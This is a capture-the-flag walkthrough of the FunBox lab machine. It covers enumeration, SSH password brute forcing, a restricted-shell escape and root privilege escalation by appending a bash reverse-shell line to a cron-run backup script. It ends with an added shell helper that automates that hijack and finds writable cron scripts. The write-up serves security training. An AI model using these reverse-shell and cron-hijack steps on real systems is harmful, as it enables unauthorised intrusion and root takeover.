FunBox Walkthrough: Proving Grounds Play

Sanaullah Aman Korai
Oct 9, 2023

This write-up covers the Funbox Capture The Flag (CTF) machine, part of Offsec’s Proving Grounds (PG) Play environment. We walk through the steps taken to get an initial foothold, escalate privileges and obtain root access on the Funbox machine.

Step 1: Initial Enumeration

Our journey begins with the essential step of network enumeration. We scan the target machine (192.168.200.77) with Nmap, using service detection and the default NSE scripts (the hostkey and robots.txt output below comes from those scripts):

Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-09 06:45 EDT
Nmap scan report for 192.168.200.77
Host is up (0.16s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 d2:f6:53:1b:5a:49:7d:74:8d:44:f5:46:e3:93:29:d3 (RSA)
| 256 a6:83:6f:1b:9c:da:b4:41:8c:29:f4:ef:33:4b:20:e0 (ECDSA)
|_ 256 a6:5b:80:03:50:19:91:66:b6:c3:98:b8:c4:4f:5c:bd (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://funbox.fritz.box/
| http-robots.txt: 1 disallowed entry
|_/secret/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.96 seconds

The scan reveals three open ports: 21 (FTP, ProFTPD), 22 (SSH, OpenSSH 8.2p1) and 80 (HTTP, Apache 2.4.41). Two details from the HTTP scripts are worth noting: the server redirects to the hostname funbox.fritz.box, and robots.txt disallows /secret/.

Step 2: Web Enumeration

Our primary focus turns to port 80. Visiting http://192.168.200.77/ redirects us to http://funbox.fritz.box/, so we add that hostname to /etc/hosts (pointing at 192.168.200.77) before continuing; without it the redirect cannot be followed. The site turns out to run on the WordPress content management system (CMS), and robots.txt disallows access to /secret/, as the Nmap output already showed.

To gather more information we use WPScan, a specialized WordPress vulnerability scanner. Its user enumeration, wpscan --url http://funbox.fritz.box/ -e u1-20 (enumerate users with IDs 1 to 20), yields two usernames.

Step 3: SSH Brute Force

With the usernames in hand, we launch a wordlist brute-force attack against the SSH login of the user “joe.”

Once Joe’s password is found, we log in to the target over SSH: ssh joe@funbox.fritz.box.

Step 4: Escaping Restricted Shell

Upon logging in we find ourselves confined to a restricted Bash shell (rbash), which blocks cd, output redirection and any command name containing a slash. The restriction is only Joe’s login shell; no forced command is configured for the SSH key or account, so we simply ask SSH to start an unrestricted shell instead: ssh joe@funbox.fritz.box -t "bash --noprofile". The -t allocates a terminal and --noprofile skips the profile files that would otherwise set up the restricted environment.

Step 5: Privilege Escalation

With a regular shell at our disposal, we explore the system further and discover a user named “funny.” That user’s home directory contains three interesting files. Among them, a hidden “reminder” note mentions a script called “backup.sh.”

It becomes apparent that the “backup.sh” script is executed at regular intervals, evidently by a cron job. Notably, it runs under two different user IDs (UIDs): UID 0 (root) and UID 1000 (funny). Watching the process list with a monitor such as pspy is the usual way to confirm which UIDs a periodic script actually runs under.

Because the script is writable by our user (verify this with ls -l before editing it), we hijack it by appending a reverse-shell payload to “backup.sh.” When cron next runs the script as root, the payload connects back to a listener on our machine (for example nc -lvnp <port>), which must already be running. The reverse shell payload used is as follows:

bash -i >& /dev/tcp/<your-ip>/<port> 0>&1

Step 6: Root Access

Having inserted our payload into “backup.sh,” we wait for the next scheduled run. When the script executes we receive a reverse shell on our listener. Because the script runs under both UIDs, the first connection may come from the funny user rather than root, so check with id; the root-owned run gives us a shell with UID 0 and full control of the target system.
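As an added example (this is not code from the original write-up), here is a small shell helper for the cron-script hijack in Steps 5 and 6. It refuses to touch a script the current user cannot write, appends the same bash reverse-shell one-liner, and can also list scripts referenced from readable crontabs that are writable by the current user. The script path /home/funny/backup.sh, the listener address 192.168.45.200 and port 4444 are assumptions for illustration.

```shell
#!/bin/sh
# Added example, not from the original write-up.
# Helpers for hijacking a script that cron runs as root.

# Build the bash reverse-shell one-liner for the given listener.
make_payload() {
    printf 'bash -i >& /dev/tcp/%s/%s 0>&1\n' "$1" "$2"
}

# Append the payload to a cron-run script.
# Checks first that the file exists and is writable by us; a silent
# failure here would just mean waiting forever for a shell that never comes.
# Returns 0 on success, 1 if the script is missing or not writable.
hijack_script() {
    script="$1"; ip="$2"; port="$3"
    if [ ! -f "$script" ]; then
        echo "no such script: $script" >&2
        return 1
    fi
    if [ ! -w "$script" ]; then
        echo "not writable by $(id -un): $(ls -l "$script")" >&2
        return 1
    fi
    make_payload "$ip" "$port" >> "$script"
}

# True if the script already carries a payload for this listener,
# so repeated runs do not stack duplicate connect-backs.
has_payload() {
    grep -qF "/dev/tcp/$2/$3" "$1"
}

# List .sh scripts referenced from the given crontab files that the
# current user can write. Root's per-user crontab under /var/spool/cron
# is not readable by an unprivileged user, so on the real box backup.sh
# had to be found via the reminder note instead; this covers
# /etc/crontab and /etc/cron.d/* style files.
writable_cron_targets() {
    cat "$@" 2>/dev/null \
      | grep -v '^[[:space:]]*#' \
      | grep -oE '(/[A-Za-z0-9._-]+)+\.sh' \
      | sort -u \
      | while read -r f; do
            if [ -w "$f" ]; then
                echo "$f"
            fi
        done
}

# Usage on the target as joe, with "nc -lvnp 4444" already listening on
# the attacking machine (assumed address 192.168.45.200):
#   writable_cron_targets /etc/crontab /etc/cron.d/*
#   hijack_script /home/funny/backup.sh 192.168.45.200 4444
```

The writability check is the part most often skipped in practice; cron will happily keep running the original script while you wait on a listener that never connects.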

And boom, we are root now :) Stay tuned for the next write-up.
